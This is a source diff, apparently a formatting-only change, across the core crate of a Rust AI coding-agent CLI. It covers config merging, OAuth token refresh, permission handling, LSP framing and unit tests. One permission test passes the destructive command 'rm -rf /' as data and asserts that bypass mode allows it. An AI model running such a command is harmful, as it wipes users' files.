 // Re-export commonly used types at the crate root
+pub use config::{
+    default_agents, strip_jsonc_comments, substitute_env_vars, AgentDefinition, CommandTemplate,
+    Config, FormatterConfig, McpServerConfig, OutputFormat, PermissionMode, ProviderConfig,
+    Settings, SkillsConfig, Theme,
+};
 pub use error::{ClaudeError, Result};
 pub use types::{
-    ContentBlock, ImageSource, DocumentSource, CitationsConfig, Message, MessageContent,
+    CitationsConfig, ContentBlock, DocumentSource, ImageSource, Message, MessageContent,
     MessageCost, Role, ToolDefinition, ToolResultContent, UsageInfo,
 };
-pub use config::{AgentDefinition, Config, CommandTemplate, FormatterConfig, McpServerConfig, OutputFormat, PermissionMode, ProviderConfig, Settings, SkillsConfig, Theme, default_agents, strip_jsonc_comments, substitute_env_vars};
 
 // Skill discovery: filesystem and git URL skill loading.
 pub mod skill_discovery;
-pub use skill_discovery::{DiscoveredSkill, discover_skills, parse_skill_file};
 pub use cost::CostTracker;
-pub use history::ConversationSession;
 pub use feature_flags::FeatureFlagManager;
-pub use snapshot::SnapshotManager;
+pub use history::ConversationSession;
 pub use permissions::{
-    AutoPermissionHandler, InteractivePermissionHandler,
-    ManagedAutoPermissionHandler, ManagedInteractivePermissionHandler,
-    PermissionAction, PermissionDecision, PermissionHandler,
-    PermissionLevel, PermissionManager, PermissionRequest,
+    format_permission_reason, AutoPermissionHandler, InteractivePermissionHandler,
+    ManagedAutoPermissionHandler, ManagedInteractivePermissionHandler, PermissionAction,
+    PermissionDecision, PermissionHandler, PermissionLevel, PermissionManager, PermissionRequest,
     PermissionRule, PermissionScope, SerializedPermissionRule,
-    format_permission_reason,
 };
+pub use skill_discovery::{discover_skills, parse_skill_file, DiscoveredSkill};
+pub use snapshot::SnapshotManager;
 
 // ---------------------------------------------------------------------------
 // error module
@@ -444,7 +446,10 @@ pub mod types {
         }
 
         /// Create a user message representing a `!`-prefixed local shell command with output.
-        pub fn user_local_command_output(command: impl Into<String>, output: impl Into<String>) -> Self {
+        pub fn user_local_command_output(
+            command: impl Into<String>,
+            output: impl Into<String>,
+        ) -> Self {
             Self {
                 role: Role::User,
                 content: MessageContent::Blocks(vec![ContentBlock::UserLocalCommandOutput {
@@ -892,7 +897,11 @@ pub mod config {
 
     impl Default for FormatterConfig {
         fn default() -> Self {
-            Self { command: Vec::new(), extensions: Vec::new(), disabled: false }
+            Self {
+                command: Vec::new(),
+                extensions: Vec::new(),
+                disabled: false,
+            }
         }
     }
 
@@ -961,7 +970,9 @@ pub mod config {
                 Some("mistral") => "mistral-large-latest",
                 Some("xai") => "grok-2",
                 Some("openrouter") => "anthropic/claude-sonnet-4",
-                Some("togetherai") | Some("together-ai") => "meta-llama/Llama-3.3-70B-Instruct-Turbo",
+                Some("togetherai") | Some("together-ai") => {
+                    "meta-llama/Llama-3.3-70B-Instruct-Turbo"
+                }
                 Some("perplexity") => "sonar-pro",
                 Some("cohere") => "command-r-plus",
                 Some("deepinfra") => "meta-llama/Llama-3.3-70B-Instruct",
@@ -975,8 +986,6 @@ pub mod config {
                 _ => crate::constants::DEFAULT_MODEL, // Anthropic default
             }
         }
-
-
 
         /// Resolve the effective max-tokens.
         pub fn effective_max_tokens(&self) -> u32 {
@@ -1046,25 +1055,43 @@ pub mod config {
                     let refreshed = 'refresh: {
                         let Ok(client) = reqwest::Client::builder()
                             .timeout(std::time::Duration::from_secs(30))
-                            .build() else { break 'refresh None; };
+                            .build()
+                        else {
+                            break 'refresh None;
+                        };
                         let Ok(resp) = client
                             .post(crate::oauth::TOKEN_URL)
                             .header("content-type", "application/json")
                             .json(&body)
                             .send()
-                            .await else { break 'refresh None; };
-                        if !resp.status().is_success() { break 'refresh None; }
-                        let Ok(data) = resp.json::<serde_json::Value>().await else { break 'refresh None; };
+                            .await
+                        else {
+                            break 'refresh None;
+                        };
+                        if !resp.status().is_success() {
+                            break 'refresh None;
+                        }
+                        let Ok(data) = resp.json::<serde_json::Value>().await else {
+                            break 'refresh None;
+                        };
                         let new_at = data["access_token"].as_str().unwrap_or("").to_string();
-                        if new_at.is_empty() { break 'refresh None; }
+                        if new_at.is_empty() {
+                            break 'refresh None;
+                        }
                         let new_rt = data["refresh_token"].as_str().map(String::from);
                         let exp_in = data["expires_in"].as_u64().unwrap_or(3600);
                         let exp_ms = chrono::Utc::now().timestamp_millis() + (exp_in as i64 * 1000);
                         let scopes: Vec<String> = data["scope"]
-                            .as_str().unwrap_or("").split_whitespace().map(String::from).collect();
+                            .as_str()
+                            .unwrap_or("")
+                            .split_whitespace()
+                            .map(String::from)
+                            .collect();
                         let mut r = tokens.clone();
                         r.access_token = new_at;
-                        if let Some(nrt) = new_rt { r.refresh_token = Some(nrt); }
+                        if let Some(nrt) = new_rt {
+                            r.refresh_token = Some(nrt);
+                        }
                         r.expires_at_ms = Some(exp_ms);
                         r.scopes = scopes;
                         let _ = r.save().await;
@@ -1163,14 +1190,23 @@ pub mod config {
             }
             // Merge top-level `providers` map into config.provider_configs.
             for (id, pc) in &self.providers {
-                config.provider_configs.entry(id.clone()).or_insert_with(|| pc.clone());
+                config
+                    .provider_configs
+                    .entry(id.clone())
+                    .or_insert_with(|| pc.clone());
             }
             // Copy top-level formatters and commands into config.
             for (k, v) in &self.formatter {
-                config.formatter.entry(k.clone()).or_insert_with(|| v.clone());
+                config
+                    .formatter
+                    .entry(k.clone())
+                    .or_insert_with(|| v.clone());
             }
             for (k, v) in &self.commands {
-                config.commands.entry(k.clone()).or_insert_with(|| v.clone());
+                config
+                    .commands
+                    .entry(k.clone())
+                    .or_insert_with(|| v.clone());
             }
             // Copy top-level agent definitions into config.
             for (k, v) in &self.agents {
@@ -1239,7 +1275,9 @@ pub mod config {
                 mut base: HashMap<K, V>,
                 over: HashMap<K, V>,
             ) -> HashMap<K, V> {
-                for (k, v) in over { base.insert(k, v); }
+                for (k, v) in over {
+                    base.insert(k, v);
+                }
                 base
             }
             // Merge the embedded Config structs.
@@ -1258,29 +1296,74 @@ pub mod config {
                 },
                 verbose: over.config.verbose || base.config.verbose,
                 output_format: over.config.output_format,
-                mcp_servers: { let mut v = base.config.mcp_servers; v.extend(over.config.mcp_servers); v },
-                lsp_servers: { let mut v = base.config.lsp_servers; v.extend(over.config.lsp_servers); v },
-                allowed_tools: { let mut v = base.config.allowed_tools; v.extend(over.config.allowed_tools); v.dedup(); v },
-                disallowed_tools: { let mut v = base.config.disallowed_tools; v.extend(over.config.disallowed_tools); v.dedup(); v },
+                mcp_servers: {
+                    let mut v = base.config.mcp_servers;
+                    v.extend(over.config.mcp_servers);
+                    v
+                },
+                lsp_servers: {
+                    let mut v = base.config.lsp_servers;
+                    v.extend(over.config.lsp_servers);
+                    v
+                },
+                allowed_tools: {
+                    let mut v = base.config.allowed_tools;
+                    v.extend(over.config.allowed_tools);
+                    v.dedup();
+                    v
+                },
+                disallowed_tools: {
+                    let mut v = base.config.disallowed_tools;
+                    v.extend(over.config.disallowed_tools);
+                    v.dedup();
+                    v
+                },
                 env: merge_map(base.config.env, over.config.env),
-                enable_all_mcp_servers: over.config.enable_all_mcp_servers || base.config.enable_all_mcp_servers,
-                custom_system_prompt: over.config.custom_system_prompt.or(base.config.custom_system_prompt),
-                append_system_prompt: over.config.append_system_prompt.or(base.config.append_system_prompt),
-                disable_claude_mds: over.config.disable_claude_mds || base.config.disable_claude_mds,
+                enable_all_mcp_servers: over.config.enable_all_mcp_servers
+                    || base.config.enable_all_mcp_servers,
+                custom_system_prompt: over
+                    .config
+                    .custom_system_prompt
+                    .or(base.config.custom_system_prompt),
+                append_system_prompt: over
+                    .config
+                    .append_system_prompt
+                    .or(base.config.append_system_prompt),
+                disable_claude_mds: over.config.disable_claude_mds
+                    || base.config.disable_claude_mds,
                 project_dir: over.config.project_dir.or(base.config.project_dir),
-                workspace_paths: { let mut v = base.config.workspace_paths; v.extend(over.config.workspace_paths); v },
-                additional_dirs: { let mut v = base.config.additional_dirs; v.extend(over.config.additional_dirs); v },
+                workspace_paths: {
+                    let mut v = base.config.workspace_paths;
+                    v.extend(over.config.workspace_paths);
+                    v
+                },
+                additional_dirs: {
+                    let mut v = base.config.additional_dirs;
+                    v.extend(over.config.additional_dirs);
+                    v
+                },
                 hooks: merge_map(base.config.hooks, over.config.hooks),
                 provider: over.config.provider.or(base.config.provider),
-                provider_configs: merge_map(base.config.provider_configs, over.config.provider_configs),
+                provider_configs: merge_map(
+                    base.config.provider_configs,
+                    over.config.provider_configs,
+                ),
                 formatter: merge_map(base.config.formatter, over.config.formatter),
                 commands: merge_map(base.config.commands, over.config.commands),
                 agents: merge_map(base.config.agents, over.config.agents),
                 skills: {
                     let mut paths = base.config.skills.paths;
-                    for p in over.config.skills.paths { if !paths.contains(&p) { paths.push(p); } }
+                    for p in over.config.skills.paths {
+                        if !paths.contains(&p) {
+                            paths.push(p);
+                        }
+                    }
                     let mut urls = base.config.skills.urls;
-                    for u in over.config.skills.urls { if !urls.contains(&u) { urls.push(u); } }
+                    for u in over.config.skills.urls {
+                        if !urls.contains(&u) {
+                            urls.push(u);
+                        }
+                    }
                     SkillsConfig { paths, urls }
                 },
                 share_endpoint: over.config.share_endpoint.or(base.config.share_endpoint),
@@ -1289,11 +1372,25 @@ pub mod config {
                 config: merged_config,
                 version: over.version.or(base.version),
                 projects: merge_map(base.projects, over.projects),
-                remote_control_at_startup: over.remote_control_at_startup || base.remote_control_at_startup,
-                permission_rules: { let mut v = base.permission_rules; v.extend(over.permission_rules); v },
-                enabled_plugins: { let mut s = base.enabled_plugins; s.extend(over.enabled_plugins); s },
-                disabled_plugins: { let mut s = base.disabled_plugins; s.extend(over.disabled_plugins); s },
-                has_completed_onboarding: over.has_completed_onboarding || base.has_completed_onboarding,
+                remote_control_at_startup: over.remote_control_at_startup
+                    || base.remote_control_at_startup,
+                permission_rules: {
+                    let mut v = base.permission_rules;
+                    v.extend(over.permission_rules);
+                    v
+                },
+                enabled_plugins: {
+                    let mut s = base.enabled_plugins;
+                    s.extend(over.enabled_plugins);
+                    s
+                },
+                disabled_plugins: {
+                    let mut s = base.disabled_plugins;
+                    s.extend(over.disabled_plugins);
+                    s
+                },
+                has_completed_onboarding: over.has_completed_onboarding
+                    || base.has_completed_onboarding,
                 last_seen_version: over.last_seen_version.or(base.last_seen_version),
                 provider: over.provider.or(base.provider),
                 providers: merge_map(base.providers, over.providers),
@@ -1302,9 +1399,17 @@ pub mod config {
                 agents: merge_map(base.agents, over.agents),
                 skills: {
                     let mut paths = base.skills.paths;
-                    for p in over.skills.paths { if !paths.contains(&p) { paths.push(p); } }
+                    for p in over.skills.paths {
+                        if !paths.contains(&p) {
+                            paths.push(p);
+                        }
+                    }
                     let mut urls = base.skills.urls;
-                    for u in over.skills.urls { if !urls.contains(&u) { urls.push(u); } }
+                    for u in over.skills.urls {
+                        if !urls.contains(&u) {
+                            urls.push(u);
+                        }
+                    }
                     SkillsConfig { paths, urls }
                 },
             }
@@ -1321,7 +1426,9 @@ pub mod config {
 
         while let Some(ch) = chars.next() {
             if in_string {
-                if ch == '"' && prev_char != '\\' { in_string = false; }
+                if ch == '"' && prev_char != '\\' {
+                    in_string = false;
+                }
                 result.push(ch);
                 prev_char = ch;
                 continue;
@@ -1336,15 +1443,24 @@ pub mod config {
                 match chars.peek() {
                     Some('/') => {
                         // Line comment — skip to end of line.
-                        for c in chars.by_ref() { if c == '\n' { result.push('\n'); break; } }
+                        for c in chars.by_ref() {
+                            if c == '\n' {
+                                result.push('\n');
+                                break;
+                            }
+                        }
                     }
                     Some('*') => {
                         // Block comment — skip until `*/`.
                         chars.next();
                         let mut prev = '\0';
                         for c in chars.by_ref() {
-                            if prev == '*' && c == '/' { break; }
-                            if c == '\n' { result.push('\n'); }
+                            if prev == '*' && c == '/' {
+                                break;
+                            }
+                            if c == '\n' {
+                                result.push('\n');
+                            }
                             prev = c;
                         }
                     }
@@ -1366,16 +1482,14 @@ pub mod config {
         loop {
             match result.find("{env:") {
                 None => break,
-                Some(start) => {
-                    match result[start..].find('}') {
-                        None => break,
-                        Some(rel_end) => {
-                            let var_name = result[start + 5..start + rel_end].to_string();
-                            let value = std::env::var(&var_name).unwrap_or_default();
-                            result.replace_range(start..start + rel_end + 1, &value);
-                        }
+                Some(start) => match result[start..].find('}') {
+                    None => break,
+                    Some(rel_end) => {
+                        let var_name = result[start + 5..start + rel_end].to_string();
+                        let value = std::env::var(&var_name).unwrap_or_default();
+                        result.replace_range(start..start + rel_end + 1, &value);
                     }
-                }
+                },
             }
         }
         result
@@ -1486,10 +1600,7 @@ pub mod context {
 
             // Platform information
             parts.push(format!("Platform: {}", std::env::consts::OS));
-            parts.push(format!(
-                "Working directory: {}",
-                self.cwd.display()
-            ));
+            parts.push(format!("Working directory: {}", self.cwd.display()));
 
             if let Some(git_context) = self.get_git_context().await {
                 parts.push(git_context);
@@ -1508,9 +1619,7 @@ pub mod context {
         pub async fn build_user_context(&self) -> String {
             let mut parts = vec![];
 
-            let date = chrono::Local::now()
-                .format("%A, %B %d, %Y")
-                .to_string();
+            let date = chrono::Local::now().format("%A, %B %d, %Y").to_string();
             parts.push(format!("Today's date is {}.", date));
 
             if !self.disable_claude_mds {
@@ -1560,8 +1669,9 @@ pub mod context {
 
             // Global ~/.claurst/AGENTS.md
             if let Some(home) = dirs::home_dir() {
-                let global_claude_md =
-                    home.join(".claurst").join(crate::constants::CLAUDE_MD_FILENAME);
+                let global_claude_md = home
+                    .join(".claurst")
+                    .join(crate::constants::CLAUDE_MD_FILENAME);
                 if global_claude_md.exists() {
                     if let Ok(content) = tokio::fs::read_to_string(&global_claude_md).await {
                         claude_mds.push(format!(
@@ -1792,10 +1902,7 @@ pub mod permissions {
                 } else {
                     "\nThis will write to the filesystem."
                 };
-                format!(
-                    "{} wants to write to `{}`{}",
-                    tool_name, target, extra
-                )
+                format!("{} wants to write to `{}`{}", tool_name, target, extra)
             }
             PermissionLevel::Network => {
                 let url = path.unwrap_or(description);
@@ -1933,11 +2040,8 @@ pub mod permissions {
             let level = PermissionLevel::for_tool(tool_name);
             match level {
                 PermissionLevel::Read => PermissionDecision::Allow,
-                PermissionLevel::Write
-                | PermissionLevel::Execute
-                | PermissionLevel::Network => {
-                    let reason =
-                        format_permission_reason(tool_name, description, path, level);
+                PermissionLevel::Write | PermissionLevel::Execute | PermissionLevel::Network => {
+                    let reason = format_permission_reason(tool_name, description, path, level);
                     PermissionDecision::Ask { reason }
                 }
             }
@@ -2246,7 +2350,10 @@ pub mod permissions {
         #[test]
         fn bypass_always_allows() {
             let m = mgr(PermissionMode::BypassPermissions);
-            assert_eq!(m.evaluate("Bash", "rm -rf /", None), PermissionDecision::Allow);
+            assert_eq!(
+                m.evaluate("Bash", "rm -rf /", None),
+                PermissionDecision::Allow
+            );
         }
 
         #[test]
@@ -2287,7 +2394,10 @@ pub mod permissions {
                 action: PermissionAction::Deny,
                 scope: PermissionScope::Session,
             });
-            assert_eq!(m.evaluate("Bash", "echo hi", None), PermissionDecision::Deny);
+            assert_eq!(
+                m.evaluate("Bash", "echo hi", None),
+                PermissionDecision::Deny
+            );
         }
 
         #[test]
@@ -2349,8 +2459,7 @@ pub mod permissions {
 
         #[test]
         fn format_reason_bash() {
-            let s =
-                format_permission_reason("Bash", "ls -la", None, PermissionLevel::Execute);
+            let s = format_permission_reason("Bash", "ls -la", None, PermissionLevel::Execute);
             assert!(s.contains("Bash wants to run"));
             assert!(s.contains("ls -la"));
         }
@@ -2766,13 +2875,7 @@ pub mod cost {
             *self.pricing.write() = ModelPricing::for_model(model);
         }
 
-        pub fn add_usage(
-            &self,
-            input: u64,
-            output: u64,
-            cache_creation: u64,
-            cache_read: u64,
-        ) {
+        pub fn add_usage(&self, input: u64, output: u64, cache_creation: u64, cache_read: u64) {
             self.input_tokens.fetch_add(input, Ordering::Relaxed);
             self.output_tokens.fetch_add(output, Ordering::Relaxed);
             self.cache_creation_tokens
@@ -2976,10 +3079,8 @@ pub mod oauth {
     pub const CONSOLE_AUTHORIZE_URL: &str = "https://platform.claude.com/oauth/authorize";
     pub const CLAUDE_AI_AUTHORIZE_URL: &str = "https://claude.com/cai/oauth/authorize";
     pub const TOKEN_URL: &str = "https://platform.claude.com/v1/oauth/token";
-    pub const API_KEY_URL: &str =
-        "https://api.anthropic.com/api/oauth/claude_cli/create_api_key";
-    pub const MANUAL_REDIRECT_URL: &str =
-        "https://platform.claude.com/oauth/code/callback";
+    pub const API_KEY_URL: &str = "https://api.anthropic.com/api/oauth/claude_cli/create_api_key";
+    pub const MANUAL_REDIRECT_URL: &str = "https://platform.claude.com/oauth/code/callback";
     pub const CLAUDEAI_SUCCESS_URL: &str =
         "https://platform.claude.com/oauth/code/success?app=claude-code";
     pub const CONSOLE_SUCCESS_URL: &str = "https://platform.claude.com/buy_credits\
@@ -3035,7 +3136,11 @@ pub mod oauth {
         /// - Claude.ai flow: the `access_token` itself (Bearer)
         pub fn effective_credential(&self) -> Option<&str> {
             if self.uses_bearer_auth() {
-                if self.access_token.is_empty() { None } else { Some(&self.access_token) }
+                if self.access_token.is_empty() {
+                    None
+                } else {
+                    Some(&self.access_token)
+                }
             } else {
                 self.api_key.as_deref()
             }
@@ -3125,8 +3230,7 @@ pub mod oauth {
         callback_port: u16,
         is_manual: bool,
     ) -> String {
-        let mut u = url::Url::parse(authorize_base)
-            .expect("valid OAuth authorize base URL");
+        let mut u = url::Url::parse(authorize_base).expect("valid OAuth authorize base URL");
         {
             let mut q = u.query_pairs_mut();
             q.append_pair("code", "true"); // tells the login page to show Claude Max upsell
@@ -3154,27 +3258,27 @@ pub use oauth::OAuthTokens;
 // New modules: keybindings, voice, analytics, lsp, team_memory_sync,
 //              system_prompt, memdir, oauth_config
 // ---------------------------------------------------------------------------
-pub mod keybindings;
-pub mod voice;
 pub mod analytics;
-pub mod lsp;
-pub mod session_tracing;
-pub mod context_collapse;
-pub mod team_memory_sync;
-pub mod system_prompt;
-pub mod memdir;
-pub mod oauth_config;
-pub mod codex_oauth;
-pub mod migrations;
-pub mod output_styles;
-pub mod feature_gates;
-pub mod tips;
-pub mod remote_settings;
-pub mod settings_sync;
-pub mod effort;
-pub mod prompt_history;
 pub mod bash_classifier;
+pub mod codex_oauth;
+pub mod context_collapse;
+pub mod effort;
+pub mod feature_gates;
+pub mod keybindings;
+pub mod lsp;
+pub mod memdir;
+pub mod migrations;
+pub mod oauth_config;
+pub mod output_styles;
+pub mod prompt_history;
 pub mod ps_classifier;
+pub mod remote_settings;
+pub mod session_tracing;
+pub mod settings_sync;
+pub mod system_prompt;
+pub mod team_memory_sync;
+pub mod tips;
+pub mod voice;
 
 // ---------------------------------------------------------------------------
 // tasks module — background task registry
@@ -3400,7 +3504,10 @@ mod tests {
     #[test]
     fn test_config_effective_max_tokens_default() {
         let cfg = crate::config::Config::default();
-        assert_eq!(cfg.effective_max_tokens(), crate::constants::DEFAULT_MAX_TOKENS);
+        assert_eq!(
+            cfg.effective_max_tokens(),
+            crate::constants::DEFAULT_MAX_TOKENS
+        );
     }
 
     #[test]
@@ -3465,7 +3572,10 @@ mod tests {
             expires_at_ms: None,
             ..Default::default()
         };
-        assert!(!tokens.is_expired(), "Token with no expiry should not be considered expired");
+        assert!(
+            !tokens.is_expired(),
+            "Token with no expiry should not be considered expired"
+        );
     }
 
     #[test]
@@ -3498,7 +3608,10 @@ mod tests {
             expires_at_ms: Some(chrono::Utc::now().timestamp_millis() + 3 * 60 * 1000),
             ..Default::default()
         };
-        assert!(tokens.is_expired(), "Token within 5-min buffer should be considered expired");
+        assert!(
+            tokens.is_expired(),
+            "Token within 5-min buffer should be considered expired"
+        );
     }
 
     #[test]
@@ -3568,9 +3681,15 @@ mod tests {
     fn test_pkce_code_verifier_length() {
         let verifier = crate::oauth::generate_code_verifier();
         // 32 bytes base64url-encoded (no padding) = ceil(32 * 4/3) = 43 chars
-        assert_eq!(verifier.len(), 43, "Code verifier should be 43 base64url chars (32 bytes)");
+        assert_eq!(
+            verifier.len(),
+            43,
+            "Code verifier should be 43 base64url chars (32 bytes)"
+        );
         // Must only contain URL-safe base64 chars
-        assert!(verifier.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
+        assert!(verifier
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
     }
 
     #[test]
@@ -3578,8 +3697,14 @@ mod tests {
         let verifier = crate::oauth::generate_code_verifier();
         let challenge = crate::oauth::generate_code_challenge(&verifier);
         // SHA256 = 32 bytes → 43 base64url chars
-        assert_eq!(challenge.len(), 43, "Code challenge should be 43 base64url chars (SHA256 = 32 bytes)");
-        assert!(challenge.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
+        assert_eq!(
+            challenge.len(),
+            43,
+            "Code challenge should be 43 base64url chars (SHA256 = 32 bytes)"
+        );
+        assert!(challenge
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
     }
 
     #[test]
@@ -3602,7 +3727,9 @@ mod tests {
     fn test_pkce_state_length_and_format() {
         let state = crate::oauth::generate_state();
         assert_eq!(state.len(), 43);
-        assert!(state.chars().all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
+        assert!(state
+            .chars()
+            .all(|c| c.is_ascii_alphanumeric() || c == '-' || c == '_'));
     }
 
     // ---- Auth URL building tests --------------------------------------------
@@ -3639,10 +3766,7 @@ mod tests {
             9999,
             true, // manual
         );
-        assert!(
-            url.contains("redirect_uri="),
-            "URL must have redirect_uri"
-        );
+        assert!(url.contains("redirect_uri="), "URL must have redirect_uri");
         // Manual redirect should NOT be localhost
         assert!(
             !url.contains("localhost"),
@@ -3754,8 +3878,12 @@ mod tests {
     #[test]
     fn test_message_get_all_text_multiple_blocks() {
         let msg = Message::assistant_blocks(vec![
-            ContentBlock::Text { text: "First ".into() },
-            ContentBlock::Text { text: "Second".into() },
+            ContentBlock::Text {
+                text: "First ".into(),
+            },
+            ContentBlock::Text {
+                text: "Second".into(),
+            },
         ]);
         assert_eq!(msg.get_all_text(), "First Second");
     }
@@ -3767,7 +3895,9 @@ mod tests {
                 thinking: "reasoning".into(),
                 signature: "sig".into(),
             },
-            ContentBlock::Text { text: "answer".into() },
+            ContentBlock::Text {
+                text: "answer".into(),
+            },
         ]);
         assert_eq!(msg.get_text(), Some("answer"));
     }

--- a/src-rust/crates/core/src/lsp.rs
+++ b/src-rust/crates/core/src/lsp.rs
@@ -123,10 +123,7 @@ impl DiagnosticSeverity {
 // JSON-RPC framing helpers
 // ---------------------------------------------------------------------------
 
-async fn send_message(
-    writer: &mut BufWriter<ChildStdin>,
-    body: &str,
-) -> anyhow::Result<()> {
+async fn send_message(writer: &mut BufWriter<ChildStdin>, body: &str) -> anyhow::Result<()> {
     let header = format!("Content-Length: {}\r\n\r\n", body.len());
     writer.write_all(header.as_bytes()).await?;
     writer.write_all(body.as_bytes()).await?;
@@ -134,9 +131,7 @@ async fn send_message(
     Ok(())
 }
 
-async fn read_message(
-    reader: &mut BufReader<ChildStdout>,
-) -> anyhow::Result<serde_json::Value> {
+async fn read_message(reader: &mut BufReader<ChildStdout>) -> anyhow::Result<serde_json::Value> {
     let mut content_length: usize = 0;
     loop {
         let mut line = String::new();
@@ -206,11 +201,7 @@ impl LspClient {
         }
 
         let mut child = cmd.spawn().map_err(|e| {
-            anyhow::anyhow!(
-                "Failed to start LSP server '{}': {}",
-                config.command,
-                e
-            )
+            anyhow::anyhow!("Failed to start LSP server '{}': {}", config.command, e)
         })?;
 
         let stdin = child
@@ -223,8 +214,7 @@ impl LspClient {
             .ok_or_else(|| anyhow::anyhow!("LSP server stdout not available"))?;
 
         let pending: PendingMap = Arc::new(DashMap::new());
-        let diagnostics: Arc<DashMap<String, Vec<LspDiagnostic>>> =
-            Arc::new(DashMap::new());
+        let diagnostics: Arc<DashMap<String, Vec<LspDiagnostic>>> = Arc::new(DashMap::new());
 
         let writer = Arc::new(Mutex::new(BufWriter::new(stdin)));
         let pending_clone = pending.clone();
@@ -249,19 +239,10 @@ impl LspClient {
             loop {
                 match read_message(&mut reader).await {
                     Ok(msg) => {
-                        dispatch_incoming(
-                            msg,
-                            &pending_clone,
-                            &diagnostics_clone,
-                            &server_name,
-                        );
+                        dispatch_incoming(msg, &pending_clone, &diagnostics_clone, &server_name);
                     }
                     Err(e) => {
-                        tracing::debug!(
-                            "LSP server {} reader exited: {}",
-                            server_name,
-                            e
-                        );
+                        tracing::debug!("LSP server {} reader exited: {}", server_name, e);
                         break;
                     }
                 }
@@ -311,23 +292,22 @@ impl LspClient {
             send_message(&mut w, &body).await?;
         }
 
-        let response =
-            tokio::time::timeout(std::time::Duration::from_secs(30), rx)
-                .await
-                .map_err(|_| {
-                    anyhow::anyhow!(
-                        "LSP request '{}' timed out (server: {})",
-                        method,
-                        self.server_name
-                    )
-                })?
-                .map_err(|_| {
-                    anyhow::anyhow!(
-                        "LSP request '{}' channel closed (server: {})",
-                        method,
-                        self.server_name
-                    )
-                })?;
+        let response = tokio::time::timeout(std::time::Duration::from_secs(30), rx)
+            .await
+            .map_err(|_| {
+                anyhow::anyhow!(
+                    "LSP request '{}' timed out (server: {})",
+                    method,
+                    self.server_name
+                )
+            })?
+            .map_err(|_| {
+                anyhow::anyhow!(
+                    "LSP request '{}' channel closed (server: {})",
+                    method,
+                    self.server_name
+                )
+            })?;
 
         if let Some(err) = response.get("error") {
             return Err(anyhow::anyhow!(
@@ -390,7 +370,8 @@ impl LspClient {
         self.send_request_inner("initialize", params).await?;
 
         // Send the `initialized` notification to complete the handshake
-        self.send_notification_inner("initialized", json!({})).await?;
+        self.send_notification_inner("initialized", json!({}))
+            .await?;
 
         self.is_initialized = true;
         tracing::debug!("LSP server '{}' initialized", self.server_name);
@@ -612,11 +593,7 @@ impl LspClient {
 
         if let Some(mut child) = self.process.take() {
             // Give the process a moment to exit cleanly.
-            let _ = tokio::time::timeout(
-                std::time::Duration::from_secs(5),
-                child.wait(),
-            )
-            .await;
+            let _ = tokio::time::timeout(std::time::Duration::from_secs(5), child.wait()).await;
             let _ = child.kill().await;
         }
         self.is_initialized = false;
@@ -646,11 +623,7 @@ fn dispatch_incoming(
     if let Some(method) = msg.get("method").and_then(|v| v.as_str()) {
         match method {
             "textDocument/publishDiagnostics" => {
-                handle_publish_diagnostics(
-                    &msg["params"],
-                    diagnostics,
-                    server_name,
-                );
+                handle_publish_diagnostics(&msg["params"], diagnostics, server_name);
             }
             _ => {
                 tracing::trace!(
@@ -780,10 +753,7 @@ fn collect_symbol(sym: &serde_json::Value, depth: usize, out: &mut Vec<String>) 
         .get("name")
         .and_then(|n| n.as_str())
         .unwrap_or("<unnamed>");
-    let kind = sym
-        .get("kind")
-        .and_then(|k| k.as_u64())
-        .unwrap_or(0);
+    let kind = sym.get("kind").and_then(|k| k.as_u64()).unwrap_or(0);
     let kind_str = symbol_kind_name(kind);
     out.push(format!("{}{} ({})", indent, name, kind_str));
 
@@ -836,8 +806,7 @@ fn path_to_uri(path: &str) -> String {
     if path.starts_with("file://") {
         return path.to_string();
     }
-    let canonical = std::fs::canonicalize(path)
-        .unwrap_or_else(|_| std::path::PathBuf::from(path));
+    let canonical = std::fs::canonicalize(path).unwrap_or_else(|_| std::path::PathBuf::from(path));
     let s = canonical.to_string_lossy();
     if cfg!(target_os = "windows") {
         // Drive letters need a leading slash: file:///C:/...
@@ -995,22 +964,14 @@ impl LspManager {
                 Ok(mut client) => {
                     let root_uri = path_to_uri(&root_dir.to_string_lossy());
                     if let Err(e) = client.initialize(&root_uri).await {
-                        tracing::warn!(
-                            "Failed to initialize LSP server '{}': {}",
-                            server_name,
-                            e
-                        );
+                        tracing::warn!("Failed to initialize LSP server '{}': {}", server_name, e);
                         // Don't insert — allow retry on next call
                         return Ok(None);
                     }
                     self.clients.insert(server_name.clone(), client);
                 }
                 Err(e) => {
-                    tracing::warn!(
-                        "Failed to start LSP server '{}': {}",
-                        server_name,
-                        e
-                    );
+                    tracing::warn!("Failed to start LSP server '{}': {}", server_name, e);
                     return Ok(None);
                 }
             }
@@ -1031,11 +992,7 @@ impl LspManager {
                 Ok(mut client) => {
                     let root_uri = path_to_uri(&root_dir.to_string_lossy());
                     if let Err(e) = client.initialize(&root_uri).await {
-                        tracing::warn!(
-                            "Failed to initialize LSP server '{}': {}",
-                            name,
-                            e
-                        );
+                        tracing::warn!("Failed to initialize LSP server '{}': {}", name, e);
                         continue;
                     }
                     self.clients.insert(name.clone(), client);
@@ -1049,11 +1006,7 @@ impl LspManager {
     }
 
     /// Open a file on the appropriate LSP server.
-    pub async fn open_file(
-        &mut self,
-        file_path: &str,
-        root_dir: &Path,
-    ) -> anyhow::Result<()> {
+    pub async fn open_file(&mut self, file_path: &str, root_dir: &Path) -> anyhow::Result<()> {
         let uri = path_to_uri(file_path);
         let server_name = match self.server_name_for_file(file_path) {
             Some(n) => n.to_string(),
@@ -1109,9 +1062,7 @@ impl LspManager {
         let uri = path_to_uri(file_path);
         let server_name = self
             .server_name_for_file(file_path)
-            .ok_or_else(|| {
-                anyhow::anyhow!("No LSP server configured for '{}'", file_path)
-            })?
+            .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))?
             .to_string();
         self.ensure_started(file_path, root_dir).await?;
         let client = self
@@ -1132,9 +1083,7 @@ impl LspManager {
         let uri = path_to_uri(file_path);
         let server_name = self
             .server_name_for_file(file_path)
-            .ok_or_else(|| {
-                anyhow::anyhow!("No LSP server configured for '{}'", file_path)
-            })?
+            .ok_or_else(|| anyhow::anyhow!("No LSP server configured for '{}'", file_path))?
             .to_string();
         self.ensure_started(file_path, root_dir).await?;
         let client = self
@@ -1155,9 +1104,7 @@ impl LspManager {
